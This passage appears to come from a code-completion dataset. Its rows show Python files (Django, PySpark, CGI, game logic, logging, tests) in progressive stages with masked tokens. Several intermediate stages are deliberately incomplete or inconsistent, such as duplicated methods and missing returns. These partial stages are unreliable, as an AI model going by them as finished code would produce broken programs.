import json
class NamingConvention:
"""Imports naming conventions from the respective .json file and puts them
into class variables.
"""
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(
__file__)), 'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
| """
Created on 02.09.2013
@author: Paul Schweizer
@email: [email protected]
@brief: Holds all the namingconventions for pandora's box
"""
import os
import json
class NamingConvention():
"""Imports naming conventions from the respective .json file and puts them
into class variables.
"""
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(__file__)),
'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
# end for constant in constants
# end def __init__
# end class NamingConvention
| [
0,
2,
3,
4,
5
] |
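A usage sketch for the loader above; the JSON keys are hypothetical, since the real namingconvention.json is not shown in the row.
# namingconvention.json (hypothetical): {"RIG_SUFFIX": "_rig", "GEO_SUFFIX": "_geo"}
nc = NamingConvention()
print(NamingConvention.RIG_SUFFIX)   # -> '_rig' with the hypothetical file above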
55 | aff1d702e591efcfc0fc93150a3fbec532408137 | <mask token>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
<mask token>
| <mask token>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
<mask token>
router.register('lamps', LampViewSet)
| <mask token>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register('lamps', LampViewSet)
| from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register('lamps', LampViewSet)
| from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register(r'lamps', LampViewSet)
| [
3,
4,
5,
6,
7
] |
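Typical wiring for the router above in a project urls.py; the 'api/' prefix is an assumption, not part of the row.
from django.urls import include, path
urlpatterns = [
    path('api/', include(router.urls)),   # exposes /api/lamps/ CRUD endpoints
]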
56 | c6502ea2b32ad90c76b6dfaf3ee3218d029eba15 | class NlpUtility:
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
<mask token>
<mask token>
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
| class NlpUtility:
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
<mask token>
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
| class NlpUtility:
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
def get_verbs(self, tokens):
verbs = []
for word, pos in tokens:
if pos == 'VB':
                verbs.append(word)
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
                nouns.append(word)
 | class NlpUtility:
    """
    Utility methods to get particular parts of speech from a token set
    """
    def get_nouns(self, tokens):
        nouns = []
        for word, pos in tokens:
            if pos == 'NN':
                nouns.append(word)
        return nouns
    def get_verbs(self, tokens):
        verbs = []
        for word, pos in tokens:
            if pos == 'VB':
                verbs.append(word)
        return verbs
    def get_adjectives(self, tokens):
        # 'JJ' is the Penn Treebank adjective tag (assumed here from the method name)
        adjectives = []
        for word, pos in tokens:
            if pos == 'JJ':
                adjectives.append(word)
        return adjectives
 | class NlpUtility():
    """
    Utility methods to get particular parts of speech from a token set
    """
    def get_nouns(self, tokens):
        nouns = []
        for word, pos in tokens:
            if pos == "NN":
                nouns.append(word)
        return nouns
    def get_verbs(self, tokens):
        verbs = []
        for word, pos in tokens:
            if pos == "VB":
                verbs.append(word)
        return verbs
    def get_adjectives(self, tokens):
        # "JJ" is the Penn Treebank adjective tag (assumed here from the method name)
        adjectives = []
        for word, pos in tokens:
            if pos == "JJ":
                adjectives.append(word)
        return adjectives
| [
3,
4,
5,
7,
8
] |
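How a token set in the expected (word, tag) shape is usually produced; this assumes nltk is installed along with its 'punkt' and tagger data.
import nltk
tokens = nltk.pos_tag(nltk.word_tokenize('The quick brown fox jumps'))
print(NlpUtility().get_nouns(tokens))    # nouns from the tagged sentence, e.g. ['fox']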
57 | 675fbdfd519d00ab10bf613e8abb7338e484fe65 | <mask token>
| <mask token>
log.setLevel(logging.DEBUG)
<mask token>
stream_handler.setFormatter(formatter)
log.addHandler(stream_handler)
| <mask token>
formatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')
log = logging.getLogger('othello')
log.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
log.addHandler(stream_handler)
| import logging
formatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')
log = logging.getLogger('othello')
log.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
log.addHandler(stream_handler)
| import logging
formatter = logging.Formatter("%(asctime)s [%(levelname)s] : %(message)s")
log = logging.getLogger("othello")
log.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
log.addHandler(stream_handler)
| [
0,
1,
2,
3,
4
] |
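Example emission for the logger configured above; with that formatter a record renders roughly as '2024-01-01 12:00:00,000 [DEBUG] : starting up'.
log.debug('starting up')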
58 | d7b45e76f150107cd62be160e8938f17dad90623 | <mask token>
| <mask token>
with open('testfile_short1.csv', 'r') as original:
data = original.read()
for i in range(2):
with open('testfile_short3.csv', 'a') as modified:
modified.write(data)
| import pandas as pd
from sqlalchemy import create_engine
with open('testfile_short1.csv', 'r') as original:
data = original.read()
for i in range(2):
with open('testfile_short3.csv', 'a') as modified:
modified.write(data)
| import pandas as pd
from sqlalchemy import create_engine
# file = 'testfile.csv'
# print(pd.read_csv(file, nrows=5))
with open('testfile_short1.csv', 'r') as original: data = original.read()
for i in range(2):
with open('testfile_short3.csv', 'a') as modified: modified.write(data) | null | [
0,
1,
2,
3
] |
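The commented-out pd.read_csv(file, nrows=5) in the last step hints at the intended use. For files too large to duplicate or load whole, pandas can stream in chunks; a hedged sketch, reusing the testfile.csv name from the row:

import pandas as pd

# Stream the CSV in 10,000-row chunks instead of reading it at once.
total_rows = 0
for chunk in pd.read_csv('testfile.csv', chunksize=10_000):
    total_rows += len(chunk)  # each chunk is an ordinary DataFrame
print(total_rows)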
59 | 61454a3d6b5b17bff871ededc6ddfe8384043884 | <mask token>
class ItemEffect(AbstractItemEffect):
<mask token>
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
<mask token>
| <mask token>
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(
BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
<mask token>
| <mask token>
BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(
BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
def register_healing_wand_item():
item_type = ItemType.HEALING_WAND
register_custom_effect_item(item_type=item_type, item_level=4,
ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.
ITEM_HEALING_WAND, image_file_path=
'resources/graphics/item_healing_wand.png', item_equipment_category
=ItemEquipmentCategory.MAIN_HAND, name='Healing wand',
custom_description=['When you damage an enemy, gain +' + str(
HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(
BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],
custom_effect=ItemEffect())
register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
register_buff_text(BUFF_TYPE, 'Healing wand')
| from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect
from pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat
from pythongame.core.game_data import UiIconSprite, register_buff_text
from pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState
from pythongame.core.item_effects import AbstractItemEffect
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_custom_effect_item
BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(
BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
def register_healing_wand_item():
item_type = ItemType.HEALING_WAND
register_custom_effect_item(item_type=item_type, item_level=4,
ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.
ITEM_HEALING_WAND, image_file_path=
'resources/graphics/item_healing_wand.png', item_equipment_category
=ItemEquipmentCategory.MAIN_HAND, name='Healing wand',
custom_description=['When you damage an enemy, gain +' + str(
HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(
BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],
custom_effect=ItemEffect())
register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
register_buff_text(BUFF_TYPE, 'Healing wand')
| from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect
from pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat
from pythongame.core.game_data import UiIconSprite, register_buff_text
from pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState
from pythongame.core.item_effects import AbstractItemEffect
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_custom_effect_item
BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS})
def register_healing_wand_item():
item_type = ItemType.HEALING_WAND
register_custom_effect_item(
item_type=item_type,
item_level=4,
ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND,
sprite=Sprite.ITEM_HEALING_WAND,
image_file_path="resources/graphics/item_healing_wand.png",
item_equipment_category=ItemEquipmentCategory.MAIN_HAND,
name="Healing wand",
custom_description=["When you damage an enemy, gain +" + str(HEALTH_REGEN_BONUS) + " health regen for " +
"{:.0f}".format(BUFF_DURATION / 1000) + "s"],
stat_modifier_intervals=[],
custom_effect=ItemEffect()
)
register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
register_buff_text(BUFF_TYPE, "Healing wand")
| [
3,
4,
6,
7,
8
] |
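The row above wires a damage event to a timed health-regen buff. A dependency-free sketch of that event-to-buff pattern; every name here is hypothetical and simplified (the real item refreshes a single registered buff rather than stacking new ones):

import time

class RegenBuff:
    def __init__(self, bonus=1, duration_s=5.0):
        self.bonus = bonus
        self.expires_at = time.monotonic() + duration_s

    def active(self):
        return time.monotonic() < self.expires_at

class Player:
    def __init__(self):
        self.base_regen = 0
        self.buffs = []

    def on_damaged_enemy(self):
        # drop expired buffs, then grant a fresh one, echoing gain_buff_effect above
        self.buffs = [b for b in self.buffs if b.active()]
        self.buffs.append(RegenBuff())

    def health_regen(self):
        return self.base_regen + sum(b.bonus for b in self.buffs if b.active())

p = Player()
p.on_damaged_enemy()
print(p.health_regen())  # 1 while the 5-second window is open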
60 | 4c60fd123f591bf2a88ca0affe14a3c3ec0d3cf6 | <mask token>
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
<mask token>
| <mask token>
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
<mask token>
print(top)
| <mask token>
sc = SparkContext('local', 'weblog app')
effective_care = sc.textFile('file:///data/exercise1/effective_care').map(
lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda
l: l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p: (p[0],
range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)
top = sorted_ranges.take(10)
print(top)
| from pyspark import SparkContext
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sc = SparkContext('local', 'weblog app')
effective_care = sc.textFile('file:///data/exercise1/effective_care').map(
lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda
l: l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p: (p[0],
range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)
top = sorted_ranges.take(10)
print(top)
| from pyspark import SparkContext
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sc = SparkContext("local", "weblog app")
effective_care = sc.textFile('file:///data/exercise1/effective_care').map(lambda l:l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p:(p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda l:l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p:(p[0], range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x:x[1], False)
top = sorted_ranges.take(10)
print(top)
| [
1,
2,
3,
4,
5
] |
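range_func above materialises every group before reducing it. The same per-measure score spread can be computed with aggregateByKey, which folds values as they stream in; a sketch under the assumption that procedure_care holds the same (measure, [hospital, score]) pairs as in the row:

# Sketch: score range per measure without collecting whole groups.
def to_int(s):
    try:
        return int(s)
    except (TypeError, ValueError):
        return None

def seq(acc, entry):
    v = to_int(entry[1])
    if v is None:
        return acc
    return (min(acc[0], v), max(acc[1], v))

def comb(a, b):
    return (min(a[0], b[0]), max(a[1], b[1]))

INF = float('inf')
ranges = procedure_care.aggregateByKey((INF, -INF), seq, comb) \
    .mapValues(lambda mm: 0 if mm[0] == INF else mm[1] - mm[0])
print(ranges.sortBy(lambda kv: kv[1], False).take(10))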
61 | 4264cba9a6c39219d21bd21d4b21009bacd1db38 | #!/usr/bin/python
import operator
import cgi, sys, LINK_HEADERS
import simplejson as json
from datetime import datetime
from dateutil import tz
from decimal import *
sys.path.insert(0, str(LINK_HEADERS.DAO_LINK))
from transaction_dao import Transaction_dao
from user_portfolio_dao import User_portfolio_dao
from user_stock_value_dao import User_stock_value_dao
from company_dao import Company_dao
from history_dao import History_dao
from sector_info_dao import Sector_info_dao
print "Content-Type: text/html\r\n\r\n"
form = cgi.FieldStorage()
if form.getvalue("username") != None:
username = form.getvalue("username")
if form.getvalue("filter") != None:
portfolio_filter = form.getvalue("filter")
if portfolio_filter == '1':
filter_flag = "ALL"
elif portfolio_filter == '2':
filter_flag = "ALGOS"
elif portfolio_filter == '0':
filter_flag = "USER"
else:
filter_flag = portfolio_filter
tdao = Transaction_dao()
u2 = User_stock_value_dao()
u1 = User_portfolio_dao()
cdao = Company_dao()
hdao = History_dao()
data={}
if filter_flag == "ALL":
t = hdao.select_all(username)
l = tdao.get_user_stock_list(username)
elif filter_flag == "ALGOS":
t = hdao.select_all_algo_trades(username)
l = tdao.get_all_algo_stock_list(username)
elif filter_flag == "USER":
t = hdao.select_all_user_trades(username)
l = tdao.get_only_user_stock_list(username)
else:
t = hdao.select_algo_trades(username, filter_flag)
l = tdao.get_algo_stock_list(username, filter_flag)
# HISTORY
if t:
data['transactions']={}
for i in range(len(t)):
data['transactions'][i]={}
#start date formatting
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
date_time = t[i].get_trans_date()
date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')
date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
date_time = date_time.replace(tzinfo=from_zone)
updated_date_time = date_time.astimezone(to_zone)
updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')
#end date formatting
data['transactions'][i]['trans_date'] = updated_date_time
data['transactions'][i]['trans_type'] = t[i].get_trans_type()
# try:
# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()
# except:
# data['transactions'][i]['name']=""
data['transactions'][i]['stock'] = t[i].get_stock()
data['transactions'][i]['price'] = t[i].get_price()
data['transactions'][i]['total_price'] = t[i].get_total_price()
data['transactions'][i]['volume'] = t[i].get_volume()
else:
data['transactions']={}
data['transactions'][0]={}
data['transactions'][0]['trans_date'] = ""
data['transactions'][0]['trans_type'] = ""
data['transactions'][0]['name']=""
data['transactions'][0]['stock'] = ""
data['transactions'][0]['price'] = ""
data['transactions'][0]['total_price'] = ""
data['transactions'][0]['volume'] = ""
# OWNED STOCKS
sector_dao=Sector_info_dao()
data['sector_volume']={}
if l:
data['owned_stocks']={}
#total_stock_value = 0
# for i in range(len(l)):
# c = cdao.get_company_model(l[i])
c = cdao.get_list_of_company_models(l)
if c:
for i in range(len(c)):
try:
o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask())
except:
continue
data['owned_stocks'][i]={}
data['owned_stocks'][i]['name']=c[i].get_name()
data['owned_stocks'][i]['stock'] = c[i].get_symbol()
data['owned_stocks'][i]['current_shares'] = o.get_volume()
data['owned_stocks'][i]['current_price'] = c[i].get_ask()
data['owned_stocks'][i]['total_worth'] = o.get_total_worth()
data['owned_stocks'][i]['profit'] = o.get_profit()
#total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())
#--------Code for chart - sector_volume:---
volume=o.get_volume()
symbol=c[i].get_symbol()
try:
sector=sector_dao.get_sector_by_symbol(symbol)
if(sector.strip()==''):sector="Other"
except:
sector="Other"
if(sector not in data['sector_volume']):
data['sector_volume'][sector]=volume;
else:
data['sector_volume'][sector]+=volume;
#----------end of code for chart--------
else:
data['owned_stocks']={}
data['owned_stocks'][0]={}
data['owned_stocks'][0]['name'] =""
data['owned_stocks'][0]['stock'] = ""
data['owned_stocks'][0]['current_shares'] = ""
data['owned_stocks'][0]['current_price'] = ""
data['owned_stocks'][0]['total_worth'] = ""
data['owned_stocks'][0]['profit'] = ""
# PORTFOLIO INFORMATION
#---------------------Code for Chart Generation-----------------------------
sectors=[]
volume=[]
sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))
length=len(sorted_volume);
#Insertion Sort
for i in range(length):
j=i
while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):
temp=sorted_volume[j-1]
sorted_volume[j-1]=sorted_volume[j]
sorted_volume[j]=temp
j=j-1
MAX=35
for i in range(length):
if(i>=MAX):break;
if(sorted_volume[i][0]=='Other'):continue
sectors.append(sorted_volume[i][0])
volume.append(sorted_volume[i][1])
data['chart_axis']=sectors;
data['chart_data']=volume;
#--------------------------------end of code for chart--------------------#
up = u1.get_user_portfolio_model(username)
usv = u2.get_user_stock_value_model(username)
data['users']={}
if up:
data['users']['total_portfolio'] = up.get_total_portfolio()
data['users']['total_deposited'] = up.get_total_deposited()
data['users']['available_funds'] = up.get_available_funds()
else:
data['users']['total_portfolio'] = 0
data['users']['total_deposited'] = 0
data['users']['available_funds'] = 0
if usv:
data['users']['total_stock_values'] = usv.get_total_stock_values()
data['users']['profit'] = usv.get_profit()
else:
data['users']['total_stock_values'] = 0
data['users']['profit'] = 0
#----------------------------------code owned Stocks chart-----------------------------#
owned_stocks=data['owned_stocks']
owned_stocks_graph_data={}
sorted_owned_stocks_chart_axis=[]
sorted_owned_stocks_chart_value=[]
for i in owned_stocks:
owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']
length=len(owned_stocks_graph_data);
sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))
for i in range(length-1,-1,-1):
if(length-i>MAX):break
sorted_owned_stocks_chart_axis.append(sorted_data[i][0])
sorted_owned_stocks_chart_value.append(sorted_data[i][1])
data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;
data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;
json_result = json.dumps(data)
print json_result
| null | null | null | null | [
0
] |
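The trickiest part of the script above is the timestamp handling: a naive UTC string is parsed, declared as UTC, then rendered in local time. The same conversion as a compact, standalone Python 3 sketch:

from datetime import datetime
from dateutil import tz

def utc_string_to_local(s, fmt='%Y-%m-%d %H:%M:%S'):
    dt = datetime.strptime(s, fmt)      # naive datetime
    dt = dt.replace(tzinfo=tz.tzutc())  # declare it as UTC
    return dt.astimezone(tz.tzlocal()).strftime(fmt)

print(utc_string_to_local('2024-01-15 18:30:00'))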
62 | 5c30b0e952ddf2e05a7ad5f8d9bbd4f5e22f887d | <mask token>
| <mask token>
print(str1 and str2)
<mask token>
for c in str1:
if c in str2:
nPos = str1.index(c)
break
print(nPos)
| str1 = '12345678'
str2 = '456'
print(str1 and str2)
str1 = 'cekjgdklab'
str2 = 'gka'
nPos = -1
for c in str1:
if c in str2:
nPos = str1.index(c)
break
print(nPos)
| # strspn(str1,str2)
str1 = '12345678'
str2 = '456'
# note: 'str1 and str2' evaluates to str2 (both strings are truthy); it is not the shared characters
print(str1 and str2)
str1 = 'cekjgdklab'
str2 = 'gka'
nPos = -1
for c in str1:
if c in str2:
nPos = str1.index(c)
break
print(nPos)
| null | [
0,
1,
2,
3
] |
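The loop above actually returns the index in str1 of the first character shared with str2, while the leading comment names C's strspn (the length of the initial run of str1 drawn only from str2). A sketch of both, for contrast:

def strspn(s, accept):
    # length of the leading segment of s consisting only of chars from accept
    accept_set = set(accept)
    n = 0
    for ch in s:
        if ch not in accept_set:
            break
        n += 1
    return n

def first_common_index(s, chars):
    # what the loop in the row computes
    return next((i for i, ch in enumerate(s) if ch in chars), -1)

print(strspn('12345678', '456'))                # 0: '1' is not in '456'
print(first_common_index('cekjgdklab', 'gka'))  # 2: 'k' is the first shared char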
63 | a86b64ccd0dab4ab70ca9c2b7625fb34afec3794 | <mask token>
class SomeModelAdmin(SummernoteModelAdmin):
<mask token>
<mask token>
| <mask token>
class SomeModelAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
<mask token>
| <mask token>
class SomeModelAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
admin.site.register(ArticlePost, SomeModelAdmin)
| from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
from .models import ArticlePost
class SomeModelAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
admin.site.register(ArticlePost, SomeModelAdmin)
| from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
from .models import ArticlePost
# Register your models here.
class SomeModelAdmin(SummernoteModelAdmin): # instead of ModelAdmin
summernote_fields = '__all__'
admin.site.register(ArticlePost, SomeModelAdmin) | [
1,
2,
3,
4,
5
] |
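An alternative registration sketch using Django's decorator form, which keeps the customised admin class and its registration in one place (django-summernote's SummernoteModelAdmin as in the row; the app-relative import is assumed):

from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
from .models import ArticlePost

@admin.register(ArticlePost)
class ArticlePostAdmin(SummernoteModelAdmin):
    summernote_fields = '__all__'  # render all text fields with the Summernote widget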
64 | f17d33f1d035da42dc9a2b4c0c60beefc6a48dea | <mask token>
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' /
'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' /
'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' /
'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' /
'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[
'path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])
)
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[
'path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])
)
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
<mask token>
def test_get_contrastLR(self):
cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
<mask token>
def test_get_choice(self):
choice = training_trials.Choice(session_path=self.training_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = training_trials.Choice(session_path=self.training_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
